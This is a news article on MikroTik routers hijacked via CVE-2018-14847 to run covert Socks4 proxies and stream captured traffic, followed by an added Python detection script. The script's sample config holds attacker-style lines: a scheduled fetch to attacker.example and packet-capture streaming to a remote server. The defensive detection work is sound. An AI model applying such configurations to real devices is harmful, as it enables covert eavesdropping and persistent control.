In yet another case of unpatched consumer devices threatening the security and privacy of users, thousands of MikroTik routers have been found eavesdropping on the traffic of the people who use them.
The routers have been hijacked through the CVE-2018-14847 security vulnerability, a known bug which impacts the MikroTik RouterOS operating system.
The vulnerability is present in Winbox, an administration utility in the MikroTik RouterOS which also offers a GUI for router configuration.
Version 6.42 of the OS “allows remote attackers to bypass authentication and read arbitrary files by modifying a request to change one byte related to a Session ID,” according to NIST.
Although the flaw was patched in August, closing the route by which threat actors could read or exfiltrate data passing through the router, many models remain vulnerable because the fix has not been applied.
Researchers from 360 Netlab say that out of over five million devices with an open TCP/8291 port online, 1.2 million are MikroTik routers — of which, 370,000 devices remain unpatched against CVE-2018-14847.
The team has been picking up active exploits of a number of these routers since mid-July through a honeypot system.
In total, over 7,500 routers are directly forwarding user data, while 239,000 have had their Socks4 proxies covertly enabled.
“The Socks4 port is mostly TCP/4153, and very interestingly, the Socks4 proxy config only allows access from one single net-block 220.127.116.11/25,” the researchers say. “In order for the attacker to gain control even after device reboot (IP change), the device is configured to run a scheduled task to periodically report its latest IP address by accessing a specific attacker’s URL. The attacker also continues to scan more MikroTik RouterOS devices by using these compromised Socks4 proxies.”
360 Netlab added that, while it is not known why this tampering has taken place, the researchers believe it is “something significant.”
All proxy requests in the impacted devices are also redirected to a local HTTP error page which the cybercriminals hoped would enable the launch of a Coinhive mining script, used to mine Monero.
However, the attacker’s own proxy ACLs block the script from operating.
“The MikroTik RouterOS device allows users to capture packets on the router and forward the captured network traffic to the specified Stream server,” the researchers said, adding that ports 20, 21, 25, 110, and 143 appear to be of the most interest to the eavesdroppers.
“This deserve[s] some questions, why the attacker is paying attention to the network management protocol regular users barely use?” 360 Netlab commented. “Are they trying to monitor and capture some special users’ network snmp community strings? We don’t have an answer at this point, but we would be very interested to know what the answer might be.”
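The three signs the researchers describe, a Socks4 proxy enabled on TCP/4153 and restricted to a single net-block, a scheduled task that periodically fetches an attacker-controlled URL, and the packet sniffer streaming captured traffic to a remote server, all leave traces in a router's exported configuration. The following Python script is an added example, not part of the article or of 360 Netlab's tooling: it walks a constructed sample written in the style of a RouterOS `/export` dump and reports each of those indicators. The command syntax, the `attacker.example` URL and the `203.0.113.7` stream server are assumptions made for illustration, not values from the report; only the `220.127.116.11/25` net-block is taken from the article.

```python
import re

# Constructed sample in the style of a RouterOS "/export" dump.
# Command and parameter names follow RouterOS conventions as an assumption;
# the URL and the 203.0.113.7 stream server are placeholders, not report data.
SAMPLE_EXPORT = """\
/ip socks
set enabled=yes port=4153
/ip socks access
add src-address=220.127.116.11/25 action=allow
add action=deny
/system scheduler
add name=upd interval=1d on-event="/tool fetch url=http://attacker.example/report mode=http"
/tool sniffer
set streaming-enabled=yes streaming-server=203.0.113.7 filter-port=21,25,110,143
"""

# key=value or key="quoted value" pairs on a single export line
_KV_RE = re.compile(r'(\S+?)=("[^"]*"|\S+)')


def parse_export(text):
    """Yield (section, settings) pairs, where section is the current '/...' menu
    path and settings is a dict of the key=value pairs found on the line."""
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("/"):          # a menu path opens a new section
            section = line
            continue
        settings = {k: v.strip('"') for k, v in _KV_RE.findall(line)}
        yield section, settings


def find_indicators(text):
    """Return a list of (indicator, detail) tuples matching the campaign's
    observed tampering: proxy enabled, scheduled fetch, sniffer streaming."""
    findings = []
    for section, kv in parse_export(text):
        if section == "/ip socks" and kv.get("enabled") == "yes":
            # RouterOS socks proxy switched on; the report saw it on TCP/4153
            findings.append(("socks_enabled", kv.get("port", "unknown")))
        elif section == "/system scheduler" and "/tool fetch" in kv.get("on-event", ""):
            # Periodic fetch of a remote URL, used to report the router's IP
            m = re.search(r"url=(\S+)", kv["on-event"])
            findings.append(("scheduler_fetch", m.group(1) if m else "unknown"))
        elif section == "/tool sniffer" and kv.get("streaming-enabled") == "yes":
            # Packet capture forwarded off-box to a stream server
            findings.append(("sniffer_streaming", kv.get("streaming-server", "unknown")))
    return findings


if __name__ == "__main__":
    for indicator, detail in find_indicators(SAMPLE_EXPORT):
        print(f"{indicator}: {detail}")
```

Run against a real `/export` file instead of the embedded sample to review a device; a proxy or sniffer that the administrator did not configure, or any scheduler entry that fetches from an address nobody recognises, is the cue to re-image the router and apply the RouterOS update rather than just deleting the entries.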
The majority of victims come from Russia, followed by Brazil, Indonesia, India, and Iran.
Due to the researchers’ findings, one of the attacker IPs, 18.104.22.168, has now been suspended and is no longer a threat.
Back in August, it was discovered that MikroTik routers were being compromised as part of a massive cryptojacking campaign. Up to 200,000 routers had been enslaved at the time of discovery and were being forced to mine for Monero by way of the Coinhive script.